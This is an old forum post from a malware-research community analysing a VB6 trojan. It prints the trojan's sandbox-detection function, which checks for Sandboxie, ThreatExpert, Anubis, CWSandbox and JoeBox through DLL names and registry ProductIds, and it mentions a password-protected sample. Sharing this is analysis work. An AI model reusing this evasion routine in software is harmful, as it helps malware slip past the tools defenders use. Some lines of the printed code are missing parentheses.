evilcry
January 27th, 2009, 03:52
Hi,
Joe from JoeBox signaled me the attached malware, that is Trojan.Win32.VB.jir, is written in VB6 and presents some basilar checks
on Online Automated Malware Analysis Tools like:
Here the Sandbox Detect Function:
Malware Zip Password: infected
Regards,
Giuseppe 'Evilcry' Bonfa'
Joe from JoeBox signaled me the attached malware, that is Trojan.Win32.VB.jir, is written in VB6 and presents some basilar checks
on Online Automated Malware Analysis Tools like:
Code:
Sandboxie
Threat Expert
Anubis
CWSandbox
JoeBox
VM:
VMware Workstation
VirtualPC
VirtualBox
Here the Sandbox Detect Function:
Code:
Public Function IsInSandbox() As Boolean
Dim hKey As Long, hOpen As Long, hQuery As Long, hSnapShot As Long
Dim me32 As MODULEENTRY32
Dim szBuffer As String * 128
hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, GetCurrentProcessId)
me32.dwSize = Len(me32)
Module32First hSnapShot, me32
Do While Module32Next(hSnapShot, me32) <> 0
If InStr(1, LCase(me32.szModule), "sbiedll.dll"> 0 Then 'Sandboxie
IsInSandbox = True
ElseIf InStr(1, LCase(me32.szModule), "dbghelp.dll"> 0 Then 'ThreatExpert
IsInSandbox = True
End If
Loop
CloseHandle (hSnapShot)
If IsInSandbox = False Then
hOpen = RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion", 0, KEY_ALL_ACCESS, hKey)
If hOpen = 0 Then
hQuery = RegQueryValueEx(hKey, "ProductId", 0, REG_SZ, szBuffer, 128)
If hQuery = 0 Then
If InStr(1, szBuffer, "76487-337-8429955-22614"> 0 Then 'Anubis
IsInSandbox = True
ElseIf InStr(1, szBuffer, "76487-644-3177037-23510"> 0 Then 'CWSandbox
IsInSandbox = True
ElseIf InStr(1, szBuffer, "55274-640-2673064-23950"> 0 Then 'JoeBox
IsInSandbox = True
End If
End If
End If
RegCloseKey (hKey)
End If
End Function
Malware Zip Password: infected
Regards,
Giuseppe 'Evilcry' Bonfa'